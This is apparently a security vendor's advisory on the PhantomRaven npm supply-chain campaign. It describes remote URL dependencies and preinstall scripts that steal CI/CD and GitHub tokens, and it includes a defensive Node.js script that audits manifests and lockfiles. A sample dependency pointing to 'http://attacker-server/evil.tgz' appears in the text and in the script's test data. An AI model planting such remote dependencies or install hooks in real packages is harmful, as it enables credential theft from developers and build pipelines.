A new supply-chain attack dubbed PhantomRaven is putting developers and enterprises alike at serious risk. Security researchers have identified 126 malicious npm packages, collectively downloaded more than 86,000 times, that are actively stealing npm tokens, GitHub credentials and CI/CD pipeline secrets.
What makes this campaign particularly dangerous: the packages appear benign in the npm registry (often zero dependencies), but use Remote Dynamic Dependencies (RDD) to fetch malicious payloads at install time – completely bypassing traditional static dependency scanning.
How it works
- The malicious packages use external URLs as dependencies (e.g., "dependencies": {"some-pkg": "http://attacker-server/evil.tgz"}), which are not visible to most automated tools.
- On installation, a preinstall script executes automatically and runs the hidden payload.
- The payload harvests tokens & secrets (npm, GitHub, Jenkins, CircleCI), fingerprints the environment (OS, IP, username) and uploads data to attacker-controlled domains.
- Many packages use “slopsquatting” (typo or AI-hallucinated names) to appear innocuous and gain installs.
Why this matters
When hidden dependencies install malicious code during npm install, developer machines and CI/CD runners become a vector for larger compromise. The blast radius includes source control, build pipelines and production deployments, and therefore spans sectors such as financial services, healthcare, retail, manufacturing and government.
What you should do now
- Audit your npm dependencies: check for packages with zero visible dependencies or recent unknown additions.
- Rotate all tokens/API keys used in CI/CD, GitHub, npm and related services – assume compromise.
- Enforce allow-listing of trusted packages and disable or block remote URL dependencies in your registry policies.
- Harden CI/CD environments: isolate build agents, restrict privileges, log all preinstall scripts and external downloads.
- Train developers and DevOps teams on supply-chain hygiene – especially awareness of typosquatting and misleading package names.
- Use runtime monitoring for unusual outbound calls from developer machines or build servers after npm install has run.
- Replace or quarantine any machine that may have executed one of the malicious packages until it can be fully audited and cleaned.
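The dependency audit in the first step can be partly automated. The Node.js script below is an added example, not code from the PhantomRaven research or from COE Security: it flags dependency sources that point outside the registry, along with install-time scripts, in a package.json and in a package-lock.json (lockfileVersion 2 or 3, using its resolved and hasInstallScript fields). The function names, the registry.npmjs.org allow-list default and the sample data are assumptions, and the check goes beyond the http example above to cover git URLs as well.

```javascript
// Added example: flags non-registry dependency sources and install-time scripts.
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const REMOTE_SPEC = /^(https?:\/\/|git(\+[a-z]+)?:\/\/)/i; // URL specs instead of version ranges
// Audit one parsed package.json (your own, or one unpacked from node_modules).
function auditManifest(pkg) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (typeof spec === "string" && REMOTE_SPEC.test(spec)) {
        findings.push({ kind: "non-registry-source", name, detail: spec });
      }
    }
  }
  for (const hook of INSTALL_HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) {
      findings.push({ kind: "install-script", name: pkg.name || "(unnamed)", detail: `${hook}: ${pkg.scripts[hook]}` });
    }
  }
  return findings;
}

// Audit a parsed package-lock.json; this also covers transitive packages.
function auditLockfile(lock, allowedHosts = ["registry.npmjs.org"]) { // assumed allow-list
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "" || entry.link) continue; // skip the root project and workspace links
    if (entry.resolved) {
      let url = null;
      try { url = new URL(entry.resolved); } catch { /* unparsable: reported below */ }
      if (!url || url.protocol !== "https:" || !allowedHosts.includes(url.hostname)) {
        findings.push({ kind: "non-registry-source", name: path, detail: entry.resolved });
      }
    }
    if (entry.hasInstallScript) {
      findings.push({ kind: "install-script", name: path, detail: "hasInstallScript" });
    }
  }
  return findings;
}
// Constructed sample input (not taken from any real package).
const sampleManifest = { name: "sample-pkg", scripts: { preinstall: "node index.js" },
  dependencies: { "some-pkg": "http://attacker-server/evil.tgz", lodash: "^4.17.21" } };
const sampleLock = { lockfileVersion: 3, packages: {
  "": { name: "app" },
  "node_modules/lodash": { resolved: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz" },
  "node_modules/some-pkg": { resolved: "http://attacker-server/evil.tgz", hasInstallScript: true } } };
console.log(auditManifest(sampleManifest), auditLockfile(sampleLock));
```

A finding is a prompt for review rather than proof of compromise: legitimate packages also ship install scripts, and private registries need to be added to the allow-list.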
Conclusion
PhantomRaven shows just how fast supply-chain attacks are evolving: by evading visibility and embedding in trusted workflows, they infect deeply before detection. If your organization relies on JavaScript/Node.js, you must treat your developer and CI/CD ecosystem as part of the frontline defense. Audit now, rotate now, secure now – the window is closing.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
In response to supply-chain campaigns like PhantomRaven, we provide package-registry risk assessments, CI/CD compromise simulations, artifact provenance verification, and developer workstation hardening services.